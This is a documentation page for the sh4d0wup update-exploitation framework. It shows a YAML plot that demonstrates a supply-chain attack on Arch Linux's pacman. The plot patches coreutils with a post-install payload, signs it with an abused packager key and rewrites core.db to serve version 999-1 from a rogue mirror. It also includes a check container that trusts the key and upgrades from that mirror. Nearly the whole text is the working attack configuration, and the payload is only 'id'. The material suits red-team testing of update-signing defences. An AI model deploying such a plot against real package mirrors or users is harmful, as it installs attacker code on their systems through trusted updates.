sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98

---

# This plot demonstrates an attack on pacman by using a packager key to sign a
# malicious update with a patched post-install hook. For demonstration purpose
# we generate a key and mark it as trusted with --lsign.

upstreams:
  archlinux:
    url: https://geo.mirror.pkgbuild.com/

## It's possible to use `selector: target` on a route to so it's only active
## for eg. some ip addresses.
#selectors:
#  target:
#    type: ipaddr
#    ipaddr: 1.3.3.7

signing_keys:
  legit:
    type: pgp
    ## PUT PACKAGER KEY HERE, then remove `uids:`
    uids: ["John Doe <no-reply@example.com>"]
    # secret_key: |
    #   -----BEGIN PGP PRIVATE KEY BLOCK-----
    #   Comment: 5AB2 9B80 E5DD DFF3 3A66  F4B8 8BD9 B381 CC2F E056
    #
    #   xVgEY6c7FhYJKwYBBAHaRw8BAQdA9Vw9iHReU5IoDR3Dq34alsBQOB+tmRQlEaU7
    #   DN9M0uQAAQCMZs/KxBa44U5OhVx41n7s43vPcobz5b5kwHYXIdI50BKcwsALBB8W
    #   CgB9BY...

artifacts:
  upstream_db:
    type: url
    url: https://geo.mirror.pkgbuild.com/core/os/x86_64/core.db
  upstream_release:
    type: pacman-pkg
    artifact: upstream_db
    url: https://geo.mirror.pkgbuild.com/core/os/x86_64/
    pkg:
      name: coreutils
  upstream_pkg:
    type: url
    url_template: '{{url}}'
    template_metadata: upstream_release

  infected_pkg:
    type: infect
    infect: pacman
    artifact: upstream_pkg
    set:
      pkgver:
        - 999-1
    payload: |
      id
  infected_sig:
    type: signature
    artifact: infected_pkg
    sign_with: legit

check:
  image: archlinux
  install_keys:
    - key: legit
      cmd: "tee /tmp/pwn.pgp > /dev/null"
  cmds:
    - ["pacman-key", "--init"]
    - ["pacman-key", "--add", "/tmp/pwn.pgp"]
    - ["pacman-key", "--lsign", "John Doe <no-reply@example.com>"]
    - 'echo "Server = http://${SH4D0WUP_BOUND_ADDR}/\$repo/os/\$arch" | tee /etc/pacman.d/mirrorlist'
    - ["pacman", "-Suy", "--noconfirm"]

routes:
  - path: "/core/os/x86_64/core.db"
    type: patch-pacman-db
    args:
      upstream: archlinux
      patch:
        - name: coreutils
          artifact: infected_pkg
          signature: infected_sig
          set:
            "%VERSION%":
              - 999-1
            "%FILENAME%":
              - "coreutils-999-1-x86_64.pkg.tar.zst"
      exclude:
        - name: amd-ucode
  - path: "/core/os/x86_64/coreutils-999-1-x86_64.pkg.tar.zst"
    type: static
    args:
      artifact: infected_pkg
  - path: "/core/os/x86_64/coreutils-999-1-x86_64.pkg.tar.zst.sig"
    type: static
    args:
      artifact: infected_sig
  - type: proxy
    args:
      upstream: archlinux